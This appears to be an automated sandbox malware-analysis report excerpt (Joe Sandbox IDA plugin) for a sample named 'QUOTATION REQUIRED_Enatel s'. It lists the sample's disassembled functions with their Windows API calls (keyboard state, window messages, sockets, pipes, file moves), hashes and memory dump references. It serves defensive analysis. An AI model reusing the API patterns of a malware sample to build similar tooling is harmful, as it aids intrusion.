                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00FA225B
                                                                                                                      • Part of subcall function 00F73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73A57
                                                                                                                      • Part of subcall function 00F73A3D: GetCurrentThreadId.KERNEL32 ref: 00F73A5E
                                                                                                                      • Part of subcall function 00F73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F725B3), ref: 00F73A65
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA22E3
                                                                                                                      • Part of subcall function 00F7E97B: Sleep.KERNEL32 ref: 00F7E9F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4196846111-0
                                                                                                                    • Opcode ID: abbbab4e5ac4a3a5c78b859d3f669d1b8595fb9b6aa5411bed58a7dad5c7970c
                                                                                                                    • Instruction ID: 42c4c48e36ef900ff69fe801139ea81c558353ac0a36169ebd4a8503e49be281
                                                                                                                    • Opcode Fuzzy Hash: abbbab4e5ac4a3a5c78b859d3f669d1b8595fb9b6aa5411bed58a7dad5c7970c
                                                                                                                    • Instruction Fuzzy Hash: 117181B6E00205AFDB50DF68C845BAEB7F5EF49320F148459E816EB351DB38ED41AB90
                                                                                                                    Function 00FA7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(01235700), ref: 00FA7F37
                                                                                                                    • IsWindowEnabled.USER32(01235700), ref: 00FA7F43
                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00FA801E
                                                                                                                    • SendMessageW.USER32(01235700,000000B0,?,?), ref: 00FA8051
                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00FA8089
                                                                                                                    • GetWindowLongW.USER32(01235700,000000EC), ref: 00FA80AB
                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FA80C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4072528602-0
                                                                                                                    • Opcode ID: 6e073208fc170df0f996d135c9cba3388c5da9b3580b169785250a469f515547
                                                                                                                    • Instruction ID: 09a36e70bfc820a530b7c31245d7500be722232fd646b039cf3c0ddedfaddad3
                                                                                                                    • Opcode Fuzzy Hash: 6e073208fc170df0f996d135c9cba3388c5da9b3580b169785250a469f515547
                                                                                                                    • Instruction Fuzzy Hash: 8171C0B4A08344AFEB20EF54CC84FEA7BB9FF4B350F144059E95557261CB31A945EBA0
                                                                                                                    Function 00F7AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00F7AEF9
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00F7AF0E
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00F7AF6F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F7AF9D
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F7AFBC
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F7AFFD
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F7B020
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 8d614128667d6145657b76296bee40a99e63db64495677d143de8ce74373ba0a
                                                                                                                    • Instruction ID: f68e4597de83d631b92a3134e5c9a9acc6622867a0191cc55a1a844a5ca0a7b5
                                                                                                                    • Opcode Fuzzy Hash: 8d614128667d6145657b76296bee40a99e63db64495677d143de8ce74373ba0a
                                                                                                                    • Instruction Fuzzy Hash: 9751D1A1A087D53DFB3682348C45BBEBEA95B46314F09C58AE1DD858C3C3D8A8C4E753
                                                                                                                    Function 00F7ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(00000000), ref: 00F7AD19
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00F7AD2E
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00F7AD8F
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F7ADBB
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F7ADD8
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F7AE17
                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F7AE38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: cbb9c5d33dd57aa0da63506d19e6f39cd7120fa6844f75474699684579e32060
                                                                                                                    • Instruction ID: 062cb2799394942d23e95285c62b11f8a116a75690f2e3a80d08e7004902d345
                                                                                                                    • Opcode Fuzzy Hash: cbb9c5d33dd57aa0da63506d19e6f39cd7120fa6844f75474699684579e32060
                                                                                                                    • Instruction Fuzzy Hash: B551E3A19047D53DFB3383248C55BBE7EA95B86310F09C48AE0DD868C2D294EC98F753
                                                                                                                    Function 00F4542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00F53CD6,?,?,?,?,?,?,?,?,00F45BA3,?,?,00F53CD6,?,?), ref: 00F45470
                                                                                                                    • __fassign.LIBCMT ref: 00F454EB
                                                                                                                    • __fassign.LIBCMT ref: 00F45506
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F53CD6,00000005,00000000,00000000), ref: 00F4552C
                                                                                                                    • WriteFile.KERNEL32(?,00F53CD6,00000000,00F45BA3,00000000,?,?,?,?,?,?,?,?,?,00F45BA3,?), ref: 00F4554B
                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00F45BA3,00000000,?,?,?,?,?,?,?,?,?,00F45BA3,?), ref: 00F45584
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: da97a08db27f1a47e1ffea7cc8ed9962fec65aef781ff15e3c647214d8310fe6
                                                                                                                    • Instruction ID: 3f944cf1c7cfe3088faf19eb59f4ccb2515b189be32c42b63524c74bcda099c5
                                                                                                                    • Opcode Fuzzy Hash: da97a08db27f1a47e1ffea7cc8ed9962fec65aef781ff15e3c647214d8310fe6
                                                                                                                    • Instruction Fuzzy Hash: 1B51E3B1E00649AFDB11DFA8DC85AEEBBF9EF09710F14401AF945E7292D7309A41DB60
                                                                                                                    Function 00F32D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F32D4B
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F32D53
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F32DE1
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F32E0C
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F32E61
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 2840c065c358296ee5cc5161864ed156f1c89cfbc9f7f3b7d14b739acf1cbfe1
                                                                                                                    • Instruction ID: f20a1dee79f69031411a82083c1d1fdc30fbd461ba543cff112b98f89d1ba714
                                                                                                                    • Opcode Fuzzy Hash: 2840c065c358296ee5cc5161864ed156f1c89cfbc9f7f3b7d14b739acf1cbfe1
                                                                                                                    • Instruction Fuzzy Hash: 1341DD35E00209ABCF50DF68CC85A9EBBB5BF44334F148155E814AB392DB35EA05EBD0
                                                                                                                    Function 00F910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F9307A
                                                                                                                      • Part of subcall function 00F9304E: _wcslen.LIBCMT ref: 00F9309B
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F91112
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91121
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F911C9
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00F911F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2675159561-0
                                                                                                                    • Opcode ID: 8d423b4b661e7d0e9d652d424b2d04dd63d1ad2f108c61fd6f67148e9f8f0027
                                                                                                                    • Instruction ID: d29339dd11579687269cdc9ed391dde60d0d979327cd7c57edd4b91b549cf072
                                                                                                                    • Opcode Fuzzy Hash: 8d423b4b661e7d0e9d652d424b2d04dd63d1ad2f108c61fd6f67148e9f8f0027
                                                                                                                    • Instruction Fuzzy Hash: 3E41E371600209AFEB109F14CC84BAABBE9FF45364F148069FD159B291C778ED81DBE1
                                                                                                                    Function 00F7CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7CF22,?), ref: 00F7DDFD
                                                                                                                      • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7CF22,?), ref: 00F7DE16
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F7CF45
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00F7CF7F
                                                                                                                    • _wcslen.LIBCMT ref: 00F7D005
                                                                                                                    • _wcslen.LIBCMT ref: 00F7D01B
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00F7D061
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                    • Opcode ID: d41e49fa43acbeb1b089659126dcf809c777fab19683d63bb93791e2840a3580
                                                                                                                    • Instruction ID: ecca875b5d9374a53472589962c8f2c2ac22915e5615cf89ad06bfd6cfd912e2
                                                                                                                    • Opcode Fuzzy Hash: d41e49fa43acbeb1b089659126dcf809c777fab19683d63bb93791e2840a3580
                                                                                                                    • Instruction Fuzzy Hash: F1415571D052185EDF12EFA4CD81FDEB7B9AF09390F4040EBE509EB141EA74A688EB51
                                                                                                                    Function 00FA2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FA2E1C
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA2E4F
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA2E84
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FA2EB6
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FA2EE0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA2EF1
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FA2F0B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178440468-0
                                                                                                                    • Opcode ID: 8bd3823af5439c99c06071ab9a1dfb5f6271a0e002f9fcff4960471e104200e1
                                                                                                                    • Instruction ID: 7e0b6c2f6692b279e9cc74119785142983a2bf1d2a9a5a9af8a0ce219297f890
                                                                                                                    • Opcode Fuzzy Hash: 8bd3823af5439c99c06071ab9a1dfb5f6271a0e002f9fcff4960471e104200e1
                                                                                                                    • Instruction Fuzzy Hash: 2231D175B04158AFEB61CF59DCC4F6937E1BB8A720F150164F9048F2A2CB71A880EB41
                                                                                                                    Function 00F77726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F77769
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F7778F
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F77792
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00F777B0
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00F777B9
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F777DE
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00F777EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 90eeba8a713288e54dc8ed20f958b885a8997cae21258ae4c4b5b1ff73048cd3
                                                                                                                    • Instruction ID: 7afff4a598b5199eba3558a0400cfc0066cfaa34c6967e7f49c236ef73a73843
                                                                                                                    • Opcode Fuzzy Hash: 90eeba8a713288e54dc8ed20f958b885a8997cae21258ae4c4b5b1ff73048cd3
                                                                                                                    • Instruction Fuzzy Hash: 9D21B076A14219AFDB14EFA8DC88DBB77ECEB093647008026FA08DB150D674DC42A7A5
                                                                                                                    Function 00F777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F77842
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F77868
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F7786B
                                                                                                                    • SysAllocString.OLEAUT32 ref: 00F7788C
                                                                                                                    • SysFreeString.OLEAUT32 ref: 00F77895
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F778AF
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00F778BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: aa85f65e8d2c806b4f7733858dc5ca871ede458d46385627bc62737dbb613fde
                                                                                                                    • Instruction ID: 624469a24040a81367888298fa2095131dcc2e7f48c8c22f5c502e7cfd543376
                                                                                                                    • Opcode Fuzzy Hash: aa85f65e8d2c806b4f7733858dc5ca871ede458d46385627bc62737dbb613fde
                                                                                                                    • Instruction Fuzzy Hash: C5217771A14218AFDB10AFB8DC8CDBA77ECEB09760710C126F915CB1A1D674DC41DB65
                                                                                                                    Function 00F804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F804F2
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F8052E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    • Opcode ID: 696a830d2c6b767608820ec3414883e522636c89434a9fb445ce9d9f07e72901
                                                                                                                    • Instruction ID: 94dfa19811cf578a5009b56589934bde18dd9cfeb9d8f148d7a8a22fd25ba0a7
                                                                                                                    • Opcode Fuzzy Hash: 696a830d2c6b767608820ec3414883e522636c89434a9fb445ce9d9f07e72901
                                                                                                                    • Instruction Fuzzy Hash: 5D217175900305AFDB20AF29DC08A9A77E4AF45724F644A19E8A1DA2E0DB709944EF60
                                                                                                                    Function 00F805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F805C6
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F80601
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    • Opcode ID: 3cf45a334ca8f205360a59680dd6c95ddac7bf851a8b673e048c3b69a2575d30
                                                                                                                    • Instruction ID: e56dd2c6f0f082b91f89abd86399e81780040ad50f64788e63ee863631ea6a49
                                                                                                                    • Opcode Fuzzy Hash: 3cf45a334ca8f205360a59680dd6c95ddac7bf851a8b673e048c3b69a2575d30
